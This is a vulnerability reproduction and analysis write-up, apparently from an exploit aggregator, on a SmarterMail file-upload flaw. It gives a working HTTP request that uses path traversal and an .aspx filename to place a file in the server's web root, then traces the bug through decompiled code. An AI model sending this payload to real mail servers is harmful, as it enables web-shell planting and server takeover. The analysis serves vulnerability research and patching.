Share 
## https://sploitus.com/exploit?id=C83C512F-6755-513A-80F4-8CAC48D10377
# CVE-2025-2025-52691-SmarterMail-Exp
# Environment Setup

```
SmarterMail 9400
https://downloads.smartertools.com/smartermail/100.0.9400/SmarterMail_9400.exe

Chrome
https://www.google.com/chrome/dev/

Winserver 2016
ed2k://|file|cn_windows_server_2016_x64_dvd_9718765.iso|6176450560|CF1B73D220F1160DE850D9E1979DBD50|/

DNSpyEx
https://github.com/dnSpyEx/dnSpy/releases

FindEverything
https://www.voidtools.com/zh-cn/support/everything/
```

The installation process is a default one; there’s nothing special to mention. During the installation, you’ll be asked to configure a domain name. I configured it as `yun.cn`.

Add the corresponding configuration to the `hosts` file.

![image-20260110024514605](F:\Books\Notes\TemporaryNotes\VulnerabilityAnalysis\SmarterMail.assets\image-20260110024514605.png)

![image-20260110024449410](F:\Books\Notes\TemporaryNotes\VulnerabilityAnalysis\SmarterMail.assets\image-20260110024449410.png)

![image-20260110024636264](F:\Books\Notes\TemporaryNotes\VulnerabilityAnalysis\SmarterMail.assets\image-20260110024636264.png)

# Vulnerability Reproduction

To access using the configured domain name, IP addresses won’t work.

![image-20260110025249395](F:\Books\Notes\TemporaryNotes\VulnerabilityAnalysis\SmarterMail.assets\image-20260110025249395.png)

```http
POST /api/upload HTTP/1.1
Host: yun.cn:9998
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 6185

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="context"

attachment
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="resumableIdentifier"

fakeID
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="resumableFilename"

fakefile.aspx
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="contextData"

{"guid":"dag/../../../../../../../inetpub/wwwroot/D7zC1a"}
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="whatever"; filename="fake.jpg"

[The file you uploaded]
------WebKitFormBoundary7MA4YWxkTrZu0gW--
```

![image-20260110025328273](F:\Books\Notes\TemporaryNotes\VulnerabilityAnalysis\SmarterMail.assets\image-20260110025328273-17679848084191.png)

# Vulnerability Analysis

Found `MailSerivce.dll`, drag it to `DNSpyEx`.

![image-20260110025729539](F:\Books\Notes\TemporaryNotes\VulnerabilityAnalysis\SmarterMail.assets\image-20260110025729539.png)

Found the `SmartMail.Web.Api` namespace.

!

There is a `FileUploadController` class; the corresponding routes are `api/upload` and the routes in exp.

![image-20260110025944266](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110025944266.png)

![image-20260110030029776](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110030029776.png)

![image-20260110030320023](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110030320023.png)

Perform dynamic debugging.

![image-20260110030503936](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110030503936.png)

![image-20260110030519946](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110030519946-17679855200793.png)

Set breakpoints in the relevant code.

![image-20260110030547813](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110030547813.png)

When sending the payload again, you need to modify the value of `resumableFilename`; it just needs to be different from the previous one.

![image-20260110030657701](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110030657701.png)

Breakpoint set successfully.

![image-20260110030725195](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110030725195.png)

In the request packet, the `context` value is `attachment`; this should lead to this branch.

![image-20260110031110752](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110031110752.png)

![image-20260110031119402](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110031119402.png)

The next breakpoint jumps here.

![image-20260110031212197](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110031212197.png)

Check the file extension.

![image-20260110024514605](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110024514605.png)

The `configuration.FileName` actually corresponds to the value of `resumableFilename` in the request packet.

![image-20260110031533363](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110031533363.png)

![image-20260110031620847](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110031620847.png)

However, the list of banned extensions here is empty.

![image-20260110031928922](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110031928922.png)

Split uploading will generate a temporary file first, storing the content of the split uploads.

![image-20260110032318681](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110032318681.png)

![image-20260110032335113](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110032335113.png)

Then, in the `TryAssembleFile` function, try to merge the files from the split uploads and delete the temporary file.

![image-20260110032749749](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110032749749.png)

Finally, in the `ProcessCompletedUploaded` function, complete the final directory traversal.

![image-20260110034718376](F:\books\notes\temporary_notes\vulnerability_analysis\SmarterMail.assets\image-20260110034718376.png)